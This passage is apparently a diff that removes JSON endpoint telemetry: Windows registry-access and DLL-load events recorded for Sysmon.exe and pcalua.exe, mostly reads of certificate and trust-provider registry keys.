"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974640000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", - "registry_value": "DelegateFolders", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ndfapi.dll", - "image_path": "C:\\Windows\\System32\\ndfapi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573974950016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wdi.dll", - "image_path": "C:\\Windows\\System32\\wdi.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573974790000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 